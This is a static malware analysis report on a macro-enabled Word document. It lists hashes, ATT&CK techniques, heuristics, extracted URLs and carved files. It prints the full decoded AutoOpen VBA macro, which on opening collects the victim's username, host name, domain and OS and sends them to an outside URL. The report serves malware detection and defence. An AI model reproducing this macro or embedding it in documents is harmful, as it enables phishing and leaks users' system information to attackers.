Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 39c6e511ba335810…

MALICIOUS

Office (OOXML)

143.6 KB Created: 2021-06-29 15:37:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-07-07
MD5: ef65a70e71a199a5932d2c5ec39b3aba SHA-1: 4b69dc4cb70f0d3533e2874d33bdc8b7b81d3378 SHA-256: 39c6e511ba335810badc53fcae274e90eed71d9c1e594af32ba4a64f5785a2be
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OOXML document containing VBA macros, specifically an AutoOpen macro designed to execute upon opening. The macro uses CreateObject to instantiate WinHttp.WinHttpRequest.5.1 and attempts to download a second-stage payload from the URL https://security.westsuburbansbank.com/macro.asp, appending user and system information. This indicates a macro-based downloader designed to lure users into enabling content.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://security.westsuburbansbank.com/macro.asp?u= In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1128 bytes
SHA-256: a86ef18f371adc14ceec8c3a12a678da586352fc159895cf0de3ad2b27be7573
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

Dim sHostName As String
Dim sUserName As String
Dim sUserDomain As String
Dim sOS As String
' Get Host Name / Get Computer Name
sHostName = Environ$("computername")

' Get Current User Name
sUserName = Environ$("username")

' Get Domain Name
sUserDomain = Environ$("userdomain")

' Get Operating System Info
sOS = Environ$("OS")

Dim MyRequest As Object

    Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
    
' Modify the URL
    MyRequest.Open "GET", _
    "https://security.westsuburbansbank.com/macro.asp?u=" & sUserName & "&v=" & sHostName & "&w=" & sUserDomain & "&x=" & sOS

    ' Send Request.
    MyRequest.Send

    'And we get this response (Uncomment the line belwo for debuginh)
    'MsgBox MyRequest.ResponseText



End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 14848 bytes
SHA-256: d338cc73ca6ce5cca7f851019b4ea0d15d40c6f570fbb46867a3699b93cdc15c
emf_00.emf ooxml-emf OOXML EMF part: docProps/thumbnail.emf 530084 bytes
SHA-256: e80d68f5f5525ca2dc7307aa73eadd3c02c3803ec33ab6b39570d65fdca902d4

Open this report in the interactive analyzer, or submit your own file for analysis.